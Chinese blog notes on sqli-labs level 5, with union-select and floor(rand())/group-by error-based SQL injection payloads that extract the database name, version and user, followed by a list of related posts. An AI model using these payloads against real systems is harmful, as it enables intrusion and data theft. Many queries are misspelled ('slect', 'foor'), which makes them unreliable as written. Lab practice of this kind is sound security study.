第一个1不断返回true,2可以进行更改
?id=-1' union select 1,2,3 and '1
?id=-1' union select 1,2,3 and 1='1

?id=-1' union select 1,@@datadir,3 and '1
@@datadir可以替换为 current_user,database() etc..

select rand();
select foor();

select table_name,table_schema from information_schema.tables group by table_schema;

select database();
slect(select database());
slect concat (select database());
slect concat (0x3a,0x3a,select database(),0x3a,0x3a);
slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a;
slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
slect concat (0x3a,0x3a,select database(),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
slect count(*), concat (0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
slect count(*), concat (0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
slect count(*), concat (0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

转载于:https://www.cnblogs.com/CMlhc/p/8858973.html

sqlilabs 5相关推荐

  1. sqli-labs:5-6,盲注

    思考1:当# --+都被过滤时,只能考虑闭合处理 思考2:union联合注入时必须先判断字段长度 eg. id=1' order by 3 and '1'='1 sqli5: 首先判断出对id经过了' ...

  2. 字符串转数字 sql_SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)

    Less-1 先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码: http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1= ...

  3. Sqli-labs less 50

    Less-50 从本关开始我们开始进行order by stacked injection! 执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli ...

  4. Sqli-labs less 62

    此处union和报错注入都已经失效了,那我们就要使用延时注入了,此处给出一个示例 payload: http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20 ...

  5. SQLi-LABS(21~25a关详解)

    SQLi-LABS Less-21 查看题目环境 登陆给我回显的数据是I LOVE YOU COOKIES. 这题看了网上的wp才知道原来是将我们的uname和passwd都进行base64编码,表示 ...

  6. SQLi-LABS(11~20关详解)

    SQLi-LABS Less-11 查看题目环境 首先可以看到这题传入正确的账号密码,会有数据回显 测试注入点 尝试post uname=admin' 通过报错语句可以发现用单引号即可闭合 post ...

  7. SQLi-LABS(1~10关详解)

    SQLi-LABS Less-1 查看题目环境 首先可以看到这题传入id=1后,会有回显,显示出该条记录 测试注入点 构造payload http://b56d9d95-d647-4065-b45b- ...

  8. SQL注入学习——时间盲注详解 sqli-labs(Less 9)

    文章目录 前言: 一.基础知识 1.时间盲注简介: 2.时间盲注常用的函数: 二.Less9 基于时间的单引号盲注 1.判断数据库名的长度: 2.猜测数据库: 3.判断表名的长度 4.猜测 secur ...

  9. SQL注入学习——Bool盲注详解 sqli-labs(Less 8)

    文章目录 前言: 一.Bool盲注常用的函数: 二.Less8 布尔型单引号GET盲注 1.查数据库版本 2.猜解数据库的长度 3.猜数据库名字 4.猜解表名 5.猜解字段名 6.猜解数据 三.脚本注 ...

  10. SQL注入学习——sqli-labs闯关(Basic Challenges)

    文章目录 前言 一.漏洞介绍 1.什么是SQL注入? 2.SQL注入原理: 3.注入漏洞分类: 二.靶场练习 基础知识: Less1 基于错误的GET单引号字符型注入 Less2 基于错误的GET数字 ...

最新文章

  1. 哭了,现在看来高校4月中旬能开学算是早的了,非毕业生可能会更晚
  2. 开源一个上架App Store的相机App
  3. OpenERP的优化---使用Nginx反向代理
  4. aarch64的TCR寄存器介绍
  5. php word 数学公式,如何在word中输入复杂的数学公式? 详细始末
  6. 车辆等级、车型分类及carsim内置车辆种类整理
  7. 企业应如何改善设备功率因数,有效规避罚款
  8. CefSharp如何获取请求响应头Headers中的数据
  9. Ubuntu20.04LTS R语言安装和RStudio配置
  10. 教育培训机构经营技巧
  11. 剪不断理还乱的前端和交互
  12. @Aspect aop切面获取请求接口类名、方法名、及参数
  13. 谁能给个orkut邀请啊~~
  14. 我没去BAT,用了8年时间,从乙方变成了甲方
  15. 几个常用术语名词解释nbsp;MSISDN,MSRN…
  16. 【解决】应用程序无法正常启动(0xc000007b)。请单击“确定”关闭应用程序。
  17. vSphere(一) 标准交换机和分布式交换机
  18. access游戏库不显示 ea_EA/Origin Access免费游戏库新增八款游戏
  19. 三星android升级名单,三星One UI 3.1升级名单曝光:含Galaxy S10系列 另更新Android 11系统升级计划...
  20. NBT封面:水稻NRT1.1B基因调控根系微生物组参与氮利用(作者解读, 端午水稻专题)...

热门文章

  1. python重命名csv文件_Python根据文件中选定的字符复制和重命名许多小csv文件
  2. redis 集群_Redis集群管理
  3. 远程同步修改云服务器上的文件
  4. css设置打印样式表,[CSS] 创建打印样式表
  5. 长短期记忆网络_思维导图:长短期记忆模型
  6. ionic4 组件的使用(一)
  7. linux 远程链接数据库报错host *** is not allowed to connect to this mysql server
  8. Java垂直镜像,Java OpenCV实现图像镜像翻转效果
  9. 业务编排可视化_微服务设计-服务组合和可视化编排思考
  10. mac xampp连接mysql数据库_在mac上如何使用终端打开XAMPP自带的MySQL